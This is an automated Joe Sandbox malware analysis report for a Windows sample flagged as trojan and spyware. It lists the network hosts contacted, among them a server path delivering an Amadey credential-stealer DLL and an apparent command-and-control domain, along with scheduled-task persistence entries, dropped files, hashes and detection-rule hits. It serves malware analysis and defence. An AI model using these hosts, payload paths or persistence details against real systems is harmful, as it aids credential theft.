                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Renew2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://tempuri.org/Entity/Id8Response2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://t.me/deadftxhttps://www.tiktok.com/86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.founder.com.cn/cn/bThe816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2006/02/addressingidentity2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingex2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.typography.netD816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://193.56.146.174/U8eZkQ0Y1ZtSx2oLsrovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://o36fafs3sn6xou.com/Mozilla/5.0explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmptrue
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://fontfabrik.com816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro94088433411392910584223625.45.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltErovwer.exe, 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.google.com/intl/en_uk/chrome/94088433411392910584223625.45.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15102B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      43.231.112.109
                                                                                                                                                                      hoteldostyk.comMongolia
                                                                                                                                                                      63962ITOOLS-ASiToolsJSCMNtrue
                                                                                                                                                                      195.96.151.53
                                                                                                                                                                      cdn-104.anonfiles.comunknown
                                                                                                                                                                      8437UTA-ASATtrue
                                                                                                                                                                      195.96.151.51
                                                                                                                                                                      cdn-102.anonfiles.comunknown
                                                                                                                                                                      8437UTA-ASATtrue
                                                                                                                                                                      140.82.121.3
                                                                                                                                                                      unknownUnited States
                                                                                                                                                                      36459GITHUBUSfalse
                                                                                                                                                                      140.82.121.4
                                                                                                                                                                      github.comUnited States
                                                                                                                                                                      36459GITHUBUSfalse
                                                                                                                                                                      162.159.133.233
                                                                                                                                                                      cdn.discordapp.comUnited States
                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                      149.154.167.99
                                                                                                                                                                      t.meUnited Kingdom
                                                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                                                      108.167.141.212
                                                                                                                                                                      srshf.comUnited States
                                                                                                                                                                      46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                      144.76.136.153
                                                                                                                                                                      transfer.shGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                      89.208.107.216
                                                                                                                                                                      unknownRussian Federation
                                                                                                                                                                      42569PSKSET-ASRUtrue
                                                                                                                                                                      52.217.206.73
                                                                                                                                                                      s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      104.192.141.1
                                                                                                                                                                      bitbucket.orgUnited States
                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                      116.202.5.101
                                                                                                                                                                      unknownGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                      148.251.234.93
                                                                                                                                                                      iplogger.comGermany
                                                                                                                                                                      24940HETZNER-ASDEfalse
                                                                                                                                                                      195.216.243.155
                                                                                                                                                                      u.toUnited Kingdom
                                                                                                                                                                      57724DDOS-GUARDRUfalse
                                                                                                                                                                      185.199.108.133
                                                                                                                                                                      raw.githubusercontent.comNetherlands
                                                                                                                                                                      54113FASTLYUStrue
                                                                                                                                                                      193.56.146.174
                                                                                                                                                                      unknownunknown
                                                                                                                                                                      10753LVLT-10753USfalse
                                                                                                                                                                      77.232.37.228
                                                                                                                                                                      o36fafs3sn6xou.comRussian Federation
                                                                                                                                                                      28968EUT-ASEUTIPNetworkRUtrue
                                                                                                                                                                      46.252.148.24
                                                                                                                                                                      1ecosolution.itItaly
                                                                                                                                                                      60087ASSUPERNOVAITtrue
                                                                                                                                                                      45.154.253.151
                                                                                                                                                                      anonfiles.comSweden
                                                                                                                                                                      41634SVEASEtrue
                                                                                                                                                                      193.56.146.168
                                                                                                                                                                      unknownunknown
                                                                                                                                                                      10753LVLT-10753UStrue
                                                                                                                                                                      IP
                                                                                                                                                                      192.168.2.1
                                                                                                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                                      Analysis ID:749806
                                                                                                                                                                      Start date and time:2022-11-19 10:36:06 +01:00
                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 11m 53s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:light
                                                                                                                                                                      Sample file name:S2XJ2wbz7u.exe
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                      Number of analysed new started processes analysed:47
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • HDC enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@67/30@58/22
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 13.5% (good quality ratio 11.6%)
                                                                                                                                                                      • Quality average: 67.1%
                                                                                                                                                                      • Quality standard deviation: 36%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 93.184.220.29, 93.184.221.240
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): google.com, fs.microsoft.com, cs9.wac.phicdn.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      10:37:52Task SchedulerRun new task: Firefox Default Browser Agent 56A8988D325A9B46 path: C:\Users\user\AppData\Roaming\tiddsjj
                                                                                                                                                                      10:38:28API Interceptor111x Sleep call for process: rovwer.exe modified
                                                                                                                                                                      10:38:29Task SchedulerRun new task: rovwer.exe path: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      10:38:39API Interceptor185x Sleep call for process: explorer.exe modified
                                                                                                                                                                      10:39:04API Interceptor4x Sleep call for process: vbc.exe modified
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2882898331044472
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                                                      MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                                                      SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                                                      SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                                                      SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.7217007190866341
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                                                      MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                                                      SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                                                      SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                                                      SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                      Entropy (8bit):1.4755077381471955
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                                                      MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                                                      SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                                                      SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                                                      SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2882898331044472
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                                                                                                      MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                                                                                                      SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                                                                                                      SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                                                                                                      SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.7217007190866341
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
                                                                                                                                                                      MD5:FEF7F4B210100663DC7731400BAC534E
                                                                                                                                                                      SHA1:E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
                                                                                                                                                                      SHA-256:E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
                                                                                                                                                                      SHA-512:6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\86EE.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1019991
                                                                                                                                                                      Entropy (8bit):7.9981268397514125
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
                                                                                                                                                                      MD5:9E73FB50D37E37EE8BD19A8E3D2B82CA
                                                                                                                                                                      SHA1:3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
                                                                                                                                                                      SHA-256:68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
                                                                                                                                                                      SHA-512:B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E..*..g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..*Mo.........i...D.GR~@.....}.....X......E|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S.........*.*..^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).|........\~.T..-k..V~....n......
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):167936
                                                                                                                                                                      Entropy (8bit):6.1797557233483955
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                                                                                                                                                      MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                                                                                                                                                      SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                                                                                                                                                      SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                                                                                                                                                      SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129024
                                                                                                                                                                      Entropy (8bit):6.5122035629449355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
                                                                                                                                                                      MD5:507E9DC7B9C42F535B6DF96D79179835
                                                                                                                                                                      SHA1:ACF41FB549750023115F060071AA5CA8C33F249E
                                                                                                                                                                      SHA-256:3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
                                                                                                                                                                      SHA-512:70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                                                                                                                                                      • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 71%, Browse
                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):300544
                                                                                                                                                                      Entropy (8bit):7.542146445882773
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:fNXZIOquqTc5+9AgXR2numfufipMbiH7Evn7TGq5gXiXRsBmS7F4GYcNLlR3LTcU:fn+uW9AskuYufipGiudsqcNxRsi9
                                                                                                                                                                      MD5:2DEE200193091BE2F2321D921750C4ED
                                                                                                                                                                      SHA1:4C5B6C7512BE4D4E200C4141DC0E90BCABCE4CA3
                                                                                                                                                                      SHA-256:7330807028605EBA5B4ECFACA0390B78CB04E4276D1DE23EB95B407E1244EF12
                                                                                                                                                                      SHA-512:4124E9BC1C7C587CE394AD35EC56FD3C6EC4466167DF6E00FFA1D88B09B34FA69072D946337CAD696223D31D85F8662FF9D5452C474D20CCA06D91A8B9C608AD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: NaN%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m4.r.g.r.g.r.g. .g.r.g. .g.r.g.xg.r.g.r.gDr.g. .g.r.g. .g.r.g. .g.r.gRich.r.g........................PE..L...^.ab.................8...........c.......P....@..................................3.......................................:..P........<..........................`................................4..@............................................text....6.......8.................. ..`.data....K...P.......<..............@....rsrc....<.......<...Z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):382464
                                                                                                                                                                      Entropy (8bit):6.969580968654444
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:O3eRNpLX3EJscap6Hi+RtWce2vjacYJdjpPnFwCLLObfwB:9NtUJsP0jVerxqC3O
                                                                                                                                                                      MD5:5E08968D858224A33175069D64DC7F39
                                                                                                                                                                      SHA1:8D18D2E867205BA9D0F42DB569C335609FDC1752
                                                                                                                                                                      SHA-256:9329CAC20692208A720E6565B51F2492FFAE539FF9B2AD469D6FAC8FDA061C87
                                                                                                                                                                      SHA-512:06D08EC2C2352AA7DFCD97F6E3691EFC1AF91CB1409543566D5D4E230D2665DB6F5C820F28D88519D6D888852FAD3B4725E32D36F9ACA3577554D6DCFED1613C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
